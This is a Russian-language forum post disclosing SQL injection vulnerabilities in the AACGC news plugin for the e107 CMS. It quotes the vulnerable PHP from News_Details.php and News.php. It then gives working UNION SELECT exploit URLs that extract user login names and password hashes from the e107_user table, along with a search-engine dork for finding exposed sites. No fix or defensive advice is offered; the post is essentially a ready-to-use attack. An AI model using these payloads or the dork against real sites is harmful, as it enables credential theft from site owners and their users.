
10.12.2010, 22:15
|
|
Guest
Сообщений: n/a
Провел на форуме: 34733
Репутация:
83
|
|
AACGC Wish List
http://plugins.e107.org/
SQL Injection:
/News_Details.php
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"aacgc_pnews"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"WHERE news_id = "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);
...[/COLOR][/COLOR]
Пример:
Код:
Code:
http://e107/e107_plugins/aacgc_pnews/News_Details.php?det.-42%20union%20select%201,concat_ws(0x3a,user_loginname,user_password),3,4,5,6,7,8%20from%20e107_user%20limit%200,1
/News.php
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"aacgc_pnews_cat"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"WHERE news_cat_id = "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Fetch[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$newscatid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'news_cat_id'[/COLOR][COLOR="#007700"]];
...
[/COLOR][COLOR="#0000BB"]$sql2[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]mySQLresult[/COLOR][COLOR="#007700"]= @[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"select * from "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]MPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"aacgc_pnews where news_cat="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newscatid[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" ORDER BY news_date DESC;"[/COLOR][COLOR="#007700"]);
...
[/COLOR][/COLOR]
Пример:
Код:
Code:
http://e107/e107_plugins/aacgc_pnews/News.php?det.-2%20union%20select%201,concat_ws(0x3a,user_name,user_password),3%20from%20e107_user
Путь:
http://e107/e107_plugins/aacgc_pnews/e_latest.php
http://e107/e107_plugins/aacgc_pnews/e_status.php
http://e107/e107_plugins/aacgc_pnews/pnews_singlecat_menu.php
Дорк:inurl:e107_plugins/aacgc_pnews/
Если боян - извиняйте.
|
|
|
|